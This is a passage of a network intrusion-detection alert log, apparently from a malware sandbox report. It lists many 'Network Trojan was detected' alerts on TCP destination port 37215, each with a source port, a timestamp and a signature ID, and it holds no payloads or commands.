                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2835222
                  Source Port:33728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.145980
                  SID:2829579
                  Source Port:40186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.062166
                  SID:2835222
                  Source Port:38640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.151143
                  SID:2829579
                  Source Port:42692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824785
                  SID:2829579
                  Source Port:57710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069487
                  SID:2829579
                  Source Port:46358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.064753
                  SID:2835222
                  Source Port:52348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609336
                  SID:2835222
                  Source Port:57816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2835222
                  Source Port:40900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.819070
                  SID:2835222
                  Source Port:34396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.887969
                  SID:2829579
                  Source Port:45962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.574488
                  SID:2829579
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.830687
                  SID:2835222
                  Source Port:58566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273517
                  SID:2835222
                  Source Port:36958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.124721
                  SID:2835222
                  Source Port:36592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.813637
                  SID:2829579
                  Source Port:49622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.148299
                  SID:2829579
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603440
                  SID:2835222
                  Source Port:53604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591446
                  SID:2829579
                  Source Port:42450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.060158
                  SID:2835222
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666546
                  SID:2835222
                  Source Port:34298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.841622
                  SID:2829579
                  Source Port:47084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857576
                  SID:2829579
                  Source Port:35730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334471
                  SID:2835222
                  Source Port:34484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.898018
                  SID:2829579
                  Source Port:55644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622738
                  SID:2829579
                  Source Port:50720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137909
                  SID:2835222
                  Source Port:41560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.528044
                  SID:2829579
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.519267
                  SID:2835222
                  Source Port:42666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.503899
                  SID:2835222
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.932335
                  SID:2835222
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2829579
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.887861
                  SID:2829579
                  Source Port:54712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2829579
                  Source Port:34078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647337
                  SID:2835222
                  Source Port:32934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177796
                  SID:2835222
                  Source Port:44894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.813463
                  SID:2829579
                  Source Port:55934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.350146
                  SID:2829579
                  Source Port:52996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.293850
                  SID:2835222
                  Source Port:37090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.874415
                  SID:2829579
                  Source Port:45470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2835222
                  Source Port:35182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915892
                  SID:2829579
                  Source Port:55982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.798571
                  SID:2835222
                  Source Port:56862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.226106
                  SID:2835222
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005351
                  SID:2835222
                  Source Port:35072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.029476
                  SID:2829579
                  Source Port:50778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.688835
                  SID:2829579
                  Source Port:39444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.380446
                  SID:2835222
                  Source Port:59968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.264722
                  SID:2829579
                  Source Port:44664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.317209
                  SID:2835222
                  Source Port:39030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.877941
                  SID:2829579
                  Source Port:51140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.394588
                  SID:2835222
                  Source Port:52654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.630822
                  SID:2835222
                  Source Port:35886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416571
                  SID:2835222
                  Source Port:45756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2835222
                  Source Port:54802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273288
                  SID:2829579
                  Source Port:34296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.550516
                  SID:2829579
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.052711
                  SID:2829579
                  Source Port:39508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.415895
                  SID:2829579
                  Source Port:33764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.890568
                  SID:2829579
                  Source Port:35498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605752
                  SID:2829579
                  Source Port:36672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.637197
                  SID:2829579
                  Source Port:58736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839974
                  SID:2829579
                  Source Port:50142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568062
                  SID:2835222
                  Source Port:58312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2835222
                  Source Port:44800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.810564
                  SID:2829579
                  Source Port:38126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.246570
                  SID:2829579
                  Source Port:34918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.020823
                  SID:2829579
                  Source Port:33666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.342192
                  SID:2835222
                  Source Port:44820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.410350
                  SID:2835222
                  Source Port:52684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.556595
                  SID:2835222
                  Source Port:41296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850174
                  SID:2829579
                  Source Port:42366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.028986
                  SID:2829579
                  Source Port:47120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144778
                  SID:2835222
                  Source Port:40576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809030
                  SID:2835222
                  Source Port:49792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.799288
                  SID:2835222
                  Source Port:52468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842656
                  SID:2835222
                  Source Port:45702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.910234
                  SID:2835222
                  Source Port:44140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2835222
                  Source Port:51316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.418339
                  SID:2829579
                  Source Port:59442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.901812
                  SID:2829579
                  Source Port:54854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.164122
                  SID:2829579
                  Source Port:37472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.177629
                  SID:2835222
                  Source Port:53524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.343465
                  SID:2835222
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751159
                  SID:2829579
                  Source Port:33046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2829579
                  Source Port:49462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.360121
                  SID:2835222
                  Source Port:41658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876739
                  SID:2829579
                  Source Port:56978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.292771
                  SID:2835222
                  Source Port:39086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2829579
                  Source Port:34480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626200
                  SID:2835222
                  Source Port:42048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224189
                  SID:2829579
                  Source Port:37702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.643122
                  SID:2835222
                  Source Port:50798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881889
                  SID:2835222
                  Source Port:52826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.569815
                  SID:2835222
                  Source Port:48602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.588924
                  SID:2829579
                  Source Port:58488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2829579
                  Source Port:59602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124417
                  SID:2829579
                  Source Port:50780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.583365
                  SID:2829579
                  Source Port:48034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.191849
                  SID:2829579
                  Source Port:51934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159705
                  SID:2829579
                  Source Port:48094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.606817
                  SID:2835222
                  Source Port:39082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.987435
                  SID:2829579
                  Source Port:36402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.913533
                  SID:2835222
                  Source Port:56334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.861603
                  SID:2835222
                  Source Port:33980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356000
                  SID:2835222
                  Source Port:57118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.843176
                  SID:2835222
                  Source Port:48384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.840922
                  SID:2835222
                  Source Port:43968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.925004
                  SID:2829579
                  Source Port:47358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.808403
                  SID:2829579
                  Source Port:58802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2829579
                  Source Port:58778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.666761
                  SID:2835222
                  Source Port:42228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861363
                  SID:2835222
                  Source Port:33178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840131
                  SID:2829579
                  Source Port:36974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876931
                  SID:2829579
                  Source Port:55862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.387304
                  SID:2835222
                  Source Port:38968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849786
                  SID:2835222
                  Source Port:59010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992846
                  SID:2835222
                  Source Port:53460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.726591
                  SID:2829579
                  Source Port:49668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.133869
                  SID:2829579
                  Source Port:56736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480089
                  SID:2829579
                  Source Port:58714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.084495
                  SID:2835222
                  Source Port:54904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165821
                  SID:2829579
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926314
                  SID:2829579
                  Source Port:40766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656614
                  SID:2835222
                  Source Port:38222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.545208
                  SID:2829579
                  Source Port:37096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.513484
                  SID:2829579
                  Source Port:47948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086476
                  SID:2829579
                  Source Port:44060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2835222
                  Source Port:36724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2835222
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857366
                  SID:2835222
                  Source Port:47376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.155678
                  SID:2835222
                  Source Port:40428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156577
                  SID:2829579
                  Source Port:38246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872058
                  SID:2835222
                  Source Port:57588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095696
                  SID:2835222
                  Source Port:44068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216677
                  SID:2835222
                  Source Port:38006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915604
                  SID:2829579
                  Source Port:50700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315595
                  SID:2829579
                  Source Port:43772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.978087
                  SID:2835222
                  Source Port:50804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435352
                  SID:2829579
                  Source Port:36768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.860039
                  SID:2835222
                  Source Port:45568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536565
                  SID:2835222
                  Source Port:49270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.461538
                  SID:2835222
                  Source Port:43728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.872806
                  SID:2829579
                  Source Port:46442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851676
                  SID:2835222
                  Source Port:41682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.340651
                  SID:2829579
                  Source Port:39564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2835222
                  Source Port:57762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.055753
                  SID:2835222
                  Source Port:36084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.554327
                  SID:2835222
                  Source Port:54142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.949605
                  SID:2835222
                  Source Port:44368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.178159
                  SID:2829579
                  Source Port:45356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.607269
                  SID:2835222
                  Source Port:44398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.991473
                  SID:2835222
                  Source Port:53948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490164
                  SID:2829579
                  Source Port:35982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857125
                  SID:2829579
                  Source Port:51338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702658
                  SID:2835222
                  Source Port:60552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.483664
                  SID:2835222
                  Source Port:50252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.918271
                  SID:2835222
                  Source Port:35430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.988913
                  SID:2835222
                  Source Port:51662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.878182
                  SID:2835222
                  Source Port:42536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.659846
                  SID:2829579
                  Source Port:57382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.975587
                  SID:2835222
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479051
                  SID:2835222
                  Source Port:41964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.560013
                  SID:2835222
                  Source Port:54124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.470847
                  SID:2835222
                  Source Port:51882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622082
                  SID:2829579
                  Source Port:50288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667118
                  SID:2829579
                  Source Port:55632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2835222
                  Source Port:34866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.863402
                  SID:2829579
                  Source Port:46054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822211
                  SID:2835222
                  Source Port:55178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.677011
                  SID:2835222
                  Source Port:57310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019340
                  SID:2835222
                  Source Port:56980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086476
                  SID:2829579
                  Source Port:42648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207305
                  SID:2835222
                  Source Port:42476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.500139
                  SID:2829579
                  Source Port:41414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324421
                  SID:2829579
                  Source Port:55290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.446439
                  SID:2835222
                  Source Port:36812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.425119
                  SID:2835222
                  Source Port:53324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.040762
                  SID:2829579
                  Source Port:36510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923513
                  SID:2829579
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.599892
                  SID:2835222
                  Source Port:60850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.906092
                  SID:2835222
